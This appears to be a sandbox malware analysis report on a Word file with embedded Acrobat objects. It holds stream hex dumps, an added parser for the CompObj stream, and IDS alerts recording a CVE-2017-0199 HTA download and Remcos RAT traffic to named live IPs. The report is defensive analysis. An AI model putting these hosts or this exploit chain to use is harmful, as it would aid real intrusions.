                                                                                                                                                                        SSDEEP:12288:hNv8Ze3RcgmpPwerHcQ8IscgVeyMDF0aEDgOXNXpcwJvC4p4pbw3ukb80:nCe3RCVLcQ8IscgVBKvEccvscV
                                                                                                                                                                        TLSH:1FE423D6378F5CB1C9BA215E85B928FE16BB24A06BF11FCF353072551A7A4F80440DD6
                                                                                                                                                                        File Content Preview:PK.........jWYs"P)............[Content_Types].xmlUT......g...g...g.V.N.0.._....E.[...j.....n.......d.....7.B..B....9.1s.vF..k...I{W.a5`.8..v..=Ln.sV$.N....l..]....&... .K5.#...'9.+R..8Zi|...5.x..I.....g\z........;2....^D...t....7.....":V\..,]3...R ../N}.-
                                                                                                                                                                        Icon Hash:2764a3aaaeb7bdbf
                                                                                                                                                                        Document Type:OpenXML
                                                                                                                                                                        Number of OLE Files:3
                                                                                                                                                                        Has Summary Info:
                                                                                                                                                                        Application Name:
                                                                                                                                                                        Encrypted Document:False
                                                                                                                                                                        Contains Word Document Stream:True
                                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                        Contains ObjectPool Stream:False
                                                                                                                                                                        Flash Objects Count:0
                                                                                                                                                                        Contains VBA Macros:False
                                                                                                                                                                        Title:
                                                                                                                                                                        Subject:
                                                                                                                                                                        Author:91974
                                                                                                                                                                        Keywords:
                                                                                                                                                                        Template:Normal.dotm
                                                                                                                                                                        Last Saved By:91974
Revision Number:2
                                                                                                                                                                        Total Edit Time:1
                                                                                                                                                                        Create Time:2024-10-23T07:48:00Z
                                                                                                                                                                        Last Saved Time:2024-10-23T07:49:00Z
                                                                                                                                                                        Number of Pages:1
                                                                                                                                                                        Number of Words:0
                                                                                                                                                                        Number of Characters:0
                                                                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                                                                        Security:0
                                                                                                                                                                        Number of Lines:1
                                                                                                                                                                        Number of Paragraphs:1
                                                                                                                                                                        Thumbnail Scaling Desired:false
                                                                                                                                                                        Company:Grizli777
                                                                                                                                                                        Contains Dirty Links:false
                                                                                                                                                                        Shared Document:false
                                                                                                                                                                        Changed Hyperlinks:false
                                                                                                                                                                        Application Version:12.0000
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1CompObj
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:94
                                                                                                                                                                        Entropy:4.345966460061678
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
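The \x1CompObj stream listed above is the OLE object's type descriptor, and decoding it is how an analyst confirms, without opening the document, what class of embedded object it carries. The parser below is an added example and is not part of the Joe Sandbox report; it follows the CompObjStream layout from MS-OLEDS (a 28-byte header whose last 16 bytes are the CLSID, a length-prefixed ANSI user type, a clipboard-format field, a length-prefixed ProgID, then the Unicode marker 0x71B239F4 and optional Unicode copies of the same fields) and runs on the 94 bytes copied from the Data Raw line above. The function names are my own, not a library API.

```python
import struct
import uuid

# The \x1CompObj stream bytes, copied from the report's "Data Raw" line
# above (94 bytes, matching the report's "Stream Size").
COMPOBJ_STREAM = bytes.fromhex(
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00"
    "11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00"
    "00 00 00 00"
    "15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00"
    "f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00"
)

UNICODE_MARKER = 0x71B239F4  # MS-OLEDS CompObjStream.UnicodeMarker


def _u32(buf, off):
    (value,) = struct.unpack_from("<I", buf, off)
    return value, off + 4


def _ansi_string(buf, off):
    """LengthPrefixedAnsiString: u32 length (including the NUL), then the bytes."""
    length, off = _u32(buf, off)
    raw = buf[off:off + length]
    if len(raw) != length:
        raise ValueError("truncated ANSI string")
    return raw.rstrip(b"\x00").decode("latin-1"), off + length


def _unicode_string(buf, off):
    """LengthPrefixedUnicodeString: u32 length in UTF-16 code units, then the text."""
    length, off = _u32(buf, off)
    raw = buf[off:off + 2 * length]
    if len(raw) != 2 * length:
        raise ValueError("truncated Unicode string")
    return raw.decode("utf-16-le").rstrip("\x00"), off + 2 * length


def _clipboard_format(buf, off, unicode=False):
    """ClipboardFormatOr(Ansi|Unicode)String: 0 = absent; 0xFFFFFFFE/0xFFFFFFFF =
    a u32 standard clipboard format id follows; anything else is a string length."""
    marker, off = _u32(buf, off)
    if marker == 0:
        return None, off
    if marker in (0xFFFFFFFE, 0xFFFFFFFF):
        return _u32(buf, off)
    width = 2 if unicode else 1
    raw = buf[off:off + width * marker]
    text = raw.decode("utf-16-le" if unicode else "latin-1").rstrip("\x00")
    return text, off + width * marker


def parse_compobj(buf):
    """Decode a CompObj stream into its identifying fields."""
    if len(buf) < 28:
        raise ValueError("CompObj header must be 28 bytes")
    reserved1, version = struct.unpack_from("<II", buf, 0)
    if reserved1 != 0xFFFE0001:
        raise ValueError("unexpected CompObj header signature")
    # Header bytes 8..12 are 0xFFFFFFFF; bytes 12..28 are the CLSID with
    # little-endian Data1/Data2/Data3, which uuid.UUID(bytes_le=...) handles.
    clsid = str(uuid.UUID(bytes_le=buf[12:28])).upper()
    off = 28
    user_type, off = _ansi_string(buf, off)
    ansi_fmt, off = _clipboard_format(buf, off)
    prog_id, off = _ansi_string(buf, off)  # "Reserved1" in the spec; holds the ProgID
    info = {
        "version": version,
        "clsid": clsid,
        "user_type": user_type,
        "clipboard_format": ansi_fmt,
        "prog_id": prog_id,
        "unicode_marker": False,
        "consumed": off,
    }
    # The Unicode section is optional; only parse it when the marker is present.
    if off + 4 <= len(buf) and _u32(buf, off)[0] == UNICODE_MARKER:
        off += 4
        info["unicode_marker"] = True
        info["unicode_user_type"], off = _unicode_string(buf, off)
        info["unicode_clipboard_format"], off = _clipboard_format(buf, off, unicode=True)
        _reserved2, off = _unicode_string(buf, off)
        info["consumed"] = off
    return info


def is_acrobat_object(info):
    """True when the descriptor names an Adobe Acrobat (AcroExch) object, i.e. the
    OLE package wraps a PDF rather than a native Office part."""
    return info["prog_id"].startswith("AcroExch.") or "Acrobat" in info["user_type"]


if __name__ == "__main__":
    decoded = parse_compobj(COMPOBJ_STREAM)
    for key, value in decoded.items():
        print(f"{key}: {value}")
    print("embedded Acrobat object:", is_acrobat_object(decoded))
```

The decoded ProgID AcroExch.Document.DC and user type "Acrobat Document" agree with the CONTENTS stream further down this page being a PDF: the OLE package is an embedded Acrobat document. A parser that stops at the first length field would still identify the object, but consuming the Unicode section as well and checking that exactly 94 bytes were used is the cheap way to catch a stream that has trailing data appended after the descriptor.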
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1Ole
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:20
                                                                                                                                                                        Entropy:0.5689955935892812
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x3EPRINT
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                        Stream Size:1505804
                                                                                                                                                                        Entropy:0.7675459840560199
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:. . . . l . . . . . . . . . . . R . . . I . . . . . . . . . . . ) . . . ; . . E M F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . X . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . ; . . . . . . . . . . S . . . J . . . Q . . . P . . . . . . . . . . R . . . I . . . . . . . . . . . . . . . . . . . S . . . J . . . P . . . ( . . . x . . . . . . . . . . . ) . . . ; . . ( . . . S . . . J . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 52 02 00 00 49 03 00 00 00 00 00 00 00 00 00 00 a4 29 00 00 14 3b 00 00 20 45 4d 46 00 00 01 00 0c fa 16 00 07 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 38 04 00 00 58 01 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3f 05 00 d0 f5 02 00 11 00 00 00 0c 00 00 00 08 00 00 00 0a 00 00 00 10 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x3ObjInfo
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:6
                                                                                                                                                                        Entropy:1.2516291673878228
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . .
                                                                                                                                                                        Data Raw:00 00 03 00 0d 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:CONTENTS
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:PDF document, version 1.7, 1 pages
                                                                                                                                                                        Stream Size:56395
                                                                                                                                                                        Entropy:7.879183004467334
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:% P D F - 1 . 7 . . 4 0 o b j . ( I d e n t i t y ) . e n d o b j . 5 0 o b j . ( A d o b e ) . e n d o b j . 8 0 o b j . < < . / F i l t e r / F l a t e D e c o d e . / L e n g t h 3 1 7 3 8 . / L e n g t h 1 4 0 2 7 6 0 . / T y p e / S t r e a m . > > . s t r e a m . x } . | \\ U 9 r % . I 2 Y & I I t . i i . $ ) P V v , H A _ ~ . . . / " L d u m = = s = . . A . ! ? * l X _ . . . } . . z . f , ^ > z 6 4 # / . \\ m 3 . . # { . l 8 . 0 } F . E . 6 o } . . ? a ? . k . . " . q . Z . [
                                                                                                                                                                        Data Raw:25 50 44 46 2d 31 2e 37 0a 0a 34 20 30 20 6f 62 6a 0a 28 49 64 65 6e 74 69 74 79 29 0a 65 6e 64 6f 62 6a 0a 35 20 30 20 6f 62 6a 0a 28 41 64 6f 62 65 29 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 2f 4c 65 6e 67 74 68 20 33 31 37 33 38 0a 2f 4c 65 6e 67 74 68 31 20 34 30 32 37 36 30 0a 2f 54 79 70 65 20 2f
                                                                                                                                                                        Has Summary Info:
                                                                                                                                                                        Application Name:
                                                                                                                                                                        Encrypted Document:False
                                                                                                                                                                        Contains Word Document Stream:True
                                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                        Contains ObjectPool Stream:False
                                                                                                                                                                        Flash Objects Count:0
                                                                                                                                                                        Contains VBA Macros:False
                                                                                                                                                                        Title:
                                                                                                                                                                        Subject:
                                                                                                                                                                        Author:91974
                                                                                                                                                                        Keywords:
                                                                                                                                                                        Template:Normal.dotm
                                                                                                                                                                        Last Saved By:91974
Revision Number:2
                                                                                                                                                                        Total Edit Time:1
                                                                                                                                                                        Create Time:2024-10-23T07:48:00Z
                                                                                                                                                                        Last Saved Time:2024-10-23T07:49:00Z
                                                                                                                                                                        Number of Pages:1
                                                                                                                                                                        Number of Words:0
                                                                                                                                                                        Number of Characters:0
                                                                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                                                                        Security:0
                                                                                                                                                                        Number of Lines:1
                                                                                                                                                                        Number of Paragraphs:1
                                                                                                                                                                        Thumbnail Scaling Desired:false
                                                                                                                                                                        Company:Grizli777
                                                                                                                                                                        Contains Dirty Links:false
                                                                                                                                                                        Shared Document:false
                                                                                                                                                                        Changed Hyperlinks:false
                                                                                                                                                                        Application Version:12.0000
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1CompObj
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:94
                                                                                                                                                                        Entropy:4.345966460061678
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1Ole
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:20
                                                                                                                                                                        Entropy:0.5689955935892812
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x3EPRINT
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                        Stream Size:1505804
                                                                                                                                                                        Entropy:1.5373625757766853
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:. . . . l . . . . . . . . . . . R . . . I . . . . . . . . . . . ) . . . ; . . E M F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . X . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . ; . . . . . . . . . . S . . . J . . . Q . . . P . . . . . . . . . . R . . . I . . . . . . . . . . . . . . . . . . . S . . . J . . . P . . . ( . . . x . . . . . . . . . . . ) . . . ; . . ( . . . S . . . J . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 52 02 00 00 49 03 00 00 00 00 00 00 00 00 00 00 a4 29 00 00 14 3b 00 00 20 45 4d 46 00 00 01 00 0c fa 16 00 07 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 38 04 00 00 58 01 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3f 05 00 d0 f5 02 00 11 00 00 00 0c 00 00 00 08 00 00 00 0a 00 00 00 10 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x3ObjInfo
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:6
                                                                                                                                                                        Entropy:1.2516291673878228
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . .
                                                                                                                                                                        Data Raw:00 00 03 00 0d 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:CONTENTS
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:PDF document, version 1.7, 1 pages (zip deflate encoded)
                                                                                                                                                                        Stream Size:120920
                                                                                                                                                                        Entropy:7.9803126267950475
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:% P D F - 1 . 7 . . % . . 1 0 o b j . . < < / P a g e s 2 0 R / T y p e / C a t a l o g / V i e w e r P r e f e r e n c e s < < / N u m C o p i e s 1 / P i c k T r a y B y P D F S i z e t r u e / P r i n t S c a l i n g / N o n e > > > > . . e n d o b j . . 2 0 o b j . . < < / C o u n t 1 / K i d s [ 4 0 R ] / T y p e / P a g e s > > . . e n d o b j . . 3 0 o b j . . < < / C r e a t i o n D a t e ( D : 2 0 2 4 0 8 1 9 1 4 1 6 0 5 ) / C r e a t o r ( P D F i u m ) / P r o d
                                                                                                                                                                        Data Raw:25 50 44 46 2d 31 2e 37 0d 0a 25 a1 b3 c5 d7 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 50 61 67 65 73 20 32 20 30 20 52 20 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 3c 3c 2f 4e 75 6d 43 6f 70 69 65 73 20 31 2f 50 69 63 6b 54 72 61 79 42 79 50 44 46 53 69 7a 65 20 74 72 75 65 2f 50 72 69 6e 74 53 63 61 6c 69 6e 67 2f 4e 6f 6e 65 3e
                                                                                                                                                                        Has Summary Info:
                                                                                                                                                                        Application Name:
                                                                                                                                                                        Encrypted Document:False
                                                                                                                                                                        Contains Word Document Stream:True
                                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                        Contains ObjectPool Stream:False
                                                                                                                                                                        Flash Objects Count:0
                                                                                                                                                                        Contains VBA Macros:False
                                                                                                                                                                        Title:
                                                                                                                                                                        Subject:
                                                                                                                                                                        Author:91974
                                                                                                                                                                        Keywords:
                                                                                                                                                                        Template:Normal.dotm
                                                                                                                                                                        Last Saved By:91974
Revision Number:2
                                                                                                                                                                        Total Edit Time:1
                                                                                                                                                                        Create Time:2024-10-23T07:48:00Z
                                                                                                                                                                        Last Saved Time:2024-10-23T07:49:00Z
                                                                                                                                                                        Number of Pages:1
                                                                                                                                                                        Number of Words:0
                                                                                                                                                                        Number of Characters:0
                                                                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                                                                        Security:0
                                                                                                                                                                        Number of Lines:1
                                                                                                                                                                        Number of Paragraphs:1
                                                                                                                                                                        Thumbnail Scaling Desired:false
                                                                                                                                                                        Company:Grizli777
                                                                                                                                                                        Contains Dirty Links:false
                                                                                                                                                                        Shared Document:false
                                                                                                                                                                        Changed Hyperlinks:false
                                                                                                                                                                        Application Version:12.0000
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1CompObj
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:94
                                                                                                                                                                        Entropy:4.345966460061678
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1Ole
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:20
                                                                                                                                                                        Entropy:0.5689955935892812
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x3EPRINT
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                        Stream Size:1504016
                                                                                                                                                                        Entropy:2.4398608801152193
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:. . . . l . . . . . . . . . . . R . . . H . . . . . . . . . . . ) . . . ; . . E M F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . X . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . ; . . . . . . . . . . S . . . I . . . Q . . . T . . . . . . . . . . R . . . H . . . . . . . . . . . . . . . . . . . S . . . I . . . P . . . ( . . . x . . . . . . . . . . . ) . . . ; . . ( . . . S . . . I . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 52 02 00 00 48 03 00 00 00 00 00 00 00 00 00 00 a4 29 00 00 02 3b 00 00 20 45 4d 46 00 00 01 00 10 f3 16 00 07 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 38 04 00 00 58 01 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3f 05 00 d0 f5 02 00 11 00 00 00 0c 00 00 00 08 00 00 00 0a 00 00 00 10 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x3ObjInfo
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:6
                                                                                                                                                                        Entropy:1.2516291673878228
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . .
                                                                                                                                                                        Data Raw:00 00 03 00 0d 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:CONTENTS
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:PDF document, version 1.7
                                                                                                                                                                        Stream Size:75331
                                                                                                                                                                        Entropy:7.9476003835705145
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:% P D F - 1 . 7 . . % . . 1 0 o b j . . < < / R e s o u r c e s < < / C o l o r S p a c e < < / C S / D e v i c e R G B > > / X O b j e c t < < / i m g 0 3 0 R > > / P r o c S e t [ / P D F / T e x t / I m a g e B / I m a g e C / I m a g e I ] / F o n t < < / F 1 2 0 R / F 2 4 0 R > > > > / M e d i a B o x [ 0 0 5 9 5 8 4 1 ] / P a r e n t 6 0 R / T y p e / P a g e / C o n t e n t s 5 0 R / G r o u p < < / C S / D e v i c e R G B / S / T r a n s p a r e n c
                                                                                                                                                                        Data Raw:25 50 44 46 2d 31 2e 37 0d 0a 25 a1 b3 c5 d7 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 52 65 73 6f 75 72 63 65 73 20 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 20 3c 3c 2f 43 53 2f 44 65 76 69 63 65 52 47 42 3e 3e 2f 58 4f 62 6a 65 63 74 20 3c 3c 2f 69 6d 67 30 20 33 20 30 20 52 3e 3e 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 2f 54 65 78 74 2f 49 6d 61 67 65 42 2f 49 6d 61 67 65 43 2f 49
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-23T17:26:32.377140+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49169 | 85.215.206.82 | 80 | TCP
2024-10-23T17:26:32.377165+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 85.215.206.82 | 80 | 192.168.2.22 | 49169 | TCP
2024-10-23T17:27:02.450167+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 216.58.212.129 | 443 | 192.168.2.22 | 49172 | TCP
2024-10-23T17:27:17.066409+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 85.215.206.82 | 80 | 192.168.2.22 | 49173 | TCP
2024-10-23T17:27:17.066409+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 85.215.206.82 | 80 | 192.168.2.22 | 49173 | TCP
2024-10-23T17:27:21.729864+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49174 | 45.90.89.98 | 6498 | TCP
2024-10-23T17:27:23.239085+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.22 | 49176 | 178.237.33.50 | 80 | TCP
2024-10-23T17:27:23.249980+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49175 | 45.90.89.98 | 6498 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2024 17:26:12.933320999 CEST | 49161 | 443 | 192.168.2.22 | 24.199.88.84
Oct 23, 2024 17:26:12.933360100 CEST | 443 | 49161 | 24.199.88.84 | 192.168.2.22
Oct 23, 2024 17:26:12.933412075 CEST | 49161 | 443 | 192.168.2.22 | 24.199.88.84
Oct 23, 2024 17:26:12.942178965 CEST | 49161 | 443 | 192.168.2.22 | 24.199.88.84
Oct 23, 2024 17:26:12.942194939 CEST | 443 | 49161 | 24.199.88.84 | 192.168.2.22
Oct 23, 2024 17:26:13.634236097 CEST | 443 | 49161 | 24.199.88.84 | 192.168.2.22
Oct 23, 2024 17:26:13.634391069 CEST | 49161 | 443 | 192.168.2.22 | 24.199.88.84
Oct 23, 2024 17:26:13.639501095 CEST | 49161 | 443 | 192.168.2.22 | 24.199.88.84
Oct 23, 2024 17:26:13.639511108 CEST | 443 | 49161 | 24.199.88.84 | 192.168.2.22
Oct 23, 2024 17:26:13.639895916 CEST | 443 | 49161 | 24.199.88.84 | 192.168.2.22
Oct 23, 2024 17:26:13.639945030 CEST | 49161 | 443 | 192.168.2.22 | 24.199.88.84
Oct 23, 2024 17:26:14.069875956 CEST | 49161 | 443 | 192.168.2.22 | 24.199.88.84
Oct 23, 2024 17:26:14.115336895 CEST | 443 | 49161 | 24.199.88.84 | 192.168.2.22
Oct 23, 2024 17:26:14.235244036 CEST | 443 | 49161 | 24.199.88.84 | 192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.235394001 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.235405922 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.235451937 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.235491037 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.235567093 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.512679100 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.512679100 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.512711048 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.512773037 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.962531090 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.962580919 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.962641954 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.963077068 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.963088036 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.657723904 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.657926083 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:15.662460089 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:15.662483931 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.662992001 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.668912888 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:15.711355925 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.839833021 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.839907885 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.840013981 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:15.840131998 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:15.840164900 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.840192080 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:15.840198040 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:19.178160906 CEST49163443192.168.2.2224.199.88.84
